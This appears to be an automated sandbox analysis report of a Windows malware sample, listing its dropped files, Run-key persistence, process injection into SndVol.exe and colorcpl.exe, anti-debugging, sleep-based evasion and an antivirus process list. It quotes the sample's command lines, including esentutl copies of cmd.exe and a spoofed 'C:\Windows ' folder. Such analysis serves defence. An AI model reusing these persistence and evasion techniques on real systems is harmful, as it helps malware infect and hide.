Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4306C push 02D430B9h; ret 0_2_02D430B1
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4306B push 02D430B9h; ret 0_2_02D430B1
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D5D1F8 push 02D5D288h; ret 0_2_02D5D280
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D5D144 push 02D5D1ECh; ret 0_2_02D5D1E4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4F108 push ecx; mov dword ptr [esp], edx 0_2_02D4F10D
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02E0D43F push ecx; ret 0_2_02E0D452
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DEB586 push ecx; ret 0_2_02DEB599
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3D5A0 push 02D3D5CCh; ret 0_2_02D3D5C4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4790C push 02D47989h; ret 0_2_02D47981

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Dlaybpxl.PIF Jump to dropped file
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02926128 ShellExecuteW,URLDownloadToFileW, 6_2_02926128

Boot Survival

Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02939BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 6_2_02939BC4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dlaybpxl Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_02D4AB1C
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0292E54F Sleep,ExitProcess, 6_2_0292E54F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0294E54F Sleep,ExitProcess, 19_2_0294E54F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 6_2_029398C2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 19_2_029598C2
Source: C:\Windows\SysWOW64\SndVol.exe Window / User API: threadDelayed 516 Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe Window / User API: threadDelayed 9477 Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe API coverage: 8.9 %
Source: C:\Users\Public\alpha.pif API coverage: 6.3 %
Source: C:\Users\Public\alpha.pif API coverage: 7.9 %
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF API coverage: 9.0 %
Source: C:\Windows\SysWOW64\SndVol.exe API coverage: 4.6 %
Source: C:\Windows\SysWOW64\SndVol.exe TID: 1584 Thread sleep count: 516 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe TID: 1584 Thread sleep time: -1548000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe TID: 1584 Thread sleep count: 9477 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe TID: 1584 Thread sleep time: -28431000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\Public\xpha.pif Last function: Thread delayed
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D35908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02D35908
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0292B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 6_2_0292B335
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0293B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 6_2_0293B42F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0296D5E9 FindFirstFileExA, 6_2_0296D5E9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0292B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 6_2_0292B53A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02927A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 6_2_02927A8C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02926AC2 FindFirstFileW,FindNextFileW, 6_2_02926AC2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029289A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 6_2_029289A9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02938C69 FindFirstFileW,FindNextFileW,FindNextFileW, 6_2_02938C69
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02928DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 6_2_02928DA7
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E40207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 9_2_00E40207
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E4589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 9_2_00E4589A
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E44EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 9_2_00E44EC1
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E53E66 FindFirstFileW,FindNextFileW,FindClose, 9_2_00E53E66
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E3532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 9_2_00E3532E
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E4589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 11_2_00E4589A
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E40207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 11_2_00E40207
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E44EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 11_2_00E44EC1
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E53E66 FindFirstFileW,FindNextFileW,FindClose, 11_2_00E53E66
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E3532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 11_2_00E3532E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0294B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 19_2_0294B335
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0295B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 19_2_0295B42F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0298D5E9 FindFirstFileExA, 19_2_0298D5E9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0294B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 19_2_0294B53A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02947A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 19_2_02947A8C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02946AC2 FindFirstFileW,FindNextFileW, 19_2_02946AC2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_029489A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 19_2_029489A9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02958C69 FindFirstFileW,FindNextFileW,FindNextFileW, 19_2_02958C69
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02948DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 19_2_02948DA7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02926F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 6_2_02926F06
Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.00000000007E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: xpha.pif, 0000000C.00000002.2390568725.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp, Dlaybpxl.PIF, 0000000F.00000002.2410857467.00000000006EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SndVol.exe, 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR
Source: Dlaybpxl.PIF, 00000017.00000002.2476572161.00000000007E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\SndVol.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF API call chain: ExitProcess graph end node

Anti Debugging

Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 0_2_02D4F744
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process queried: DebugPort
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0295A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_0295A65D
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02D4894C
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DF9AE4 mov eax, dword ptr fs:[00000030h] 0_2_02DF9AE4
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02962554 mov eax, dword ptr fs:[00000030h] 6_2_02962554
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E5C1FA mov eax, dword ptr fs:[00000030h] 9_2_00E5C1FA
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E5C1FA mov eax, dword ptr fs:[00000030h] 11_2_00E5C1FA
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02982554 mov eax, dword ptr fs:[00000030h] 19_2_02982554
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02930B19 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError, 6_2_02930B19
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02954168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_02954168
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0295A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_0295A65D
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02953B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_02953B44
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02953CD7 SetUnhandledExceptionFilter, 6_2_02953CD7
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E46EC0 SetUnhandledExceptionFilter, 9_2_00E46EC0
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E46B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_00E46B40
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E46EC0 SetUnhandledExceptionFilter, 11_2_00E46EC0
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E46B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00E46B40
Source: C:\Users\Public\xpha.pif Code function: 12_2_00843600 SetUnhandledExceptionFilter, 12_2_00843600
Source: C:\Users\Public\xpha.pif Code function: 12_2_00843470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00843470
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02974168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_02974168
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0297A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_0297A65D
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02973B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_02973B44
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02973CD7 SetUnhandledExceptionFilter, 19_2_02973CD7

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 2920000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 2940000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2460000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Thread APC queued: target process: C:\Windows\SysWOW64\SndVol.exe
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 6_2_02930F36
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 19_2_02950F36
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02938754 mouse_event, 6_2_02938754
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DEB39A cpuid 0_2_02DEB39A
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02D35ACC
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: GetLocaleInfoA, 0_2_02D3A7C4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: GetLocaleInfoA, 0_2_02D3A810
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02D35BD8
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 6_2_029712EA
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_029713B7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 6_2_029710BA
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 6_2_029670AE
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_029711E3
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoA, 6_2_0292E679
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 6_2_02967597
Source: C:\Windows\SysWOW64\SndVol.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 6_2_02970A7F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 6_2_02970E6A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 6_2_02970CF7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 6_2_02970DDD
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 6_2_02970D42
Source: C:\Users\Public\alpha.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 9_2_00E38572
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc, 9_2_00E36854
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 9_2_00E39310
Source: C:\Users\Public\alpha.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 11_2_00E38572
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc, 11_2_00E36854
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 11_2_00E39310
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 15_2_02E25ACC
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 15_2_02E25BD7
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: GetLocaleInfoA, 15_2_02E2A810
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 19_2_029912EA
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 19_2_029913B7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 19_2_029910BA
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 19_2_029870AE
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 19_2_029911E3
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoA, 19_2_0294E679
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 19_2_02987597
Source: C:\Windows\SysWOW64\SndVol.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 19_2_02990A7F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 19_2_02990E6A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 19_2_02990CF7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 19_2_02990DDD
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 19_2_02990D42
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\alpha.pif Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3920C GetLocalTime, 0_2_02D3920C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0293A7A2 GetComputerNameExW,GetUserNameW, 6_2_0293A7A2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0296800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 6_2_0296800F
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3B78C GetVersionExA, 0_2_02D3B78C
Source: C:\Windows\SysWOW64\SndVol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
